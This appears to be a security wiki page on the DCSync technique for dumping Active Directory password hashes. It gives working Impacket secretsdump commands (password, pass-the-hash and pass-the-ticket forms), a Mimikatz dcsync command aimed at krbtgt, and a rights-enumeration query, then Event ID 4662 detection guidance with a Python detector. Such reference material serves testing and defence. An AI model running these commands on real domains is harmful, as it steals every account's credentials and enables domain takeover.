# DCSync

**Dump Password Hashes from Domain Controller**

DCSync is a credential dumping technique in which the adversary impersonates a Domain Controller and asks another DC to replicate directory data, including password hashes, over the Directory Replication Service Remote Protocol (MS-DRSR). The protocol cannot be disabled, because MS-DRSR is a required service of Active Directory.

This attack requires domain-admin-level privileges, specifically the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups hold these rights by default.

## Enumeration

```
# PowerView: list which principals hold the replication extended rights on the domain object
Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{ $_.ObjectType -match 'ds-replication-get-changes' }
```

## Impacket: secretsdump

```
# impacket target syntax: [domain/]user[:password]@<Domain Controller IP or hostname>
# using a plaintext password
secretsdump.py -outputfile 'file.name' 'domain'/'User':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

# with Pass-the-Hash (the LM half may be left empty, i.e. ':NThash')
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'domain'/'User'@'Domain Controller IP'

# with Pass-the-Ticket (-k reads the ticket from the credential cache named by KRB5CCNAME)
secretsdump.py -k -outputfile 'file.name' 'domain'/'User'@'Domain Controller IP'
```

### Example

{% embed url="https://calvin-lai.gitbook.io/calvin-lai-security/exploit-cve-poc/zerologon-exploit#start-exploit" %}
Secrets Dump
{% endembed %}

{% embed url="https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/windows-machine/sauna#h.2tnfkp5exzdk" %}
Pass-the-Hash Attack
{% endembed %}

## Mimikatz

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'
```


## Detection

Monitor Windows Security Event ID 4662 (an operation was performed on an object) for the GUIDs of the replication extended rights in its Properties field: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Event 4662 is only written when the Directory Service Access audit subcategory is enabled. Domain controllers request these rights from each other during normal replication, so exclude the DC computer accounts (names ending in `$`) and alert on any other account that requests them.
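The detection rule above, as an added example that is not part of the original page: it scans 4662 records for the three replication GUIDs and suppresses requests from known DC computer accounts. The event dicts mirror the EventData fields of a 4662 record and are constructed sample data; the DC name list is an assumed input.

```python
import re

# Extended-right GUIDs that appear in the Properties field of Security event 4662
# when a principal requests directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def replication_rights(properties):
    """Return the names of replication rights referenced in a Properties field (case-insensitive)."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, domain_controllers):
    """Return (DOMAIN\\account, rights) for 4662 events that request replication
    from any principal other than the known DC computer accounts."""
    dc_accounts = {dc.rstrip("$").upper() + "$" for dc in domain_controllers}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # 4662 on something other than a replication right
        account = ev["SubjectUserName"]
        if account.upper() in dc_accounts:
            continue  # DC-to-DC replication is expected
        alerts.append((f"{ev['SubjectDomainName']}\\{account}", rights))
    return alerts


# Constructed sample events (not real log data). Properties follows the
# "%%7688 {guid}" layout the event uses; the middle one is a non-replication GUID.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "Properties": "%%7688\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "SubjectUserName": "svc-backup", "SubjectDomainName": "CORP",
     "Properties": "%%7688\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "SubjectUserName": "svc-backup", "SubjectDomainName": "CORP", "Properties": "-"},
]

if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_EVENTS, ["DC01", "DC02"]):
        print(f"possible DCSync by {who}: {', '.join(rights)}")
```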
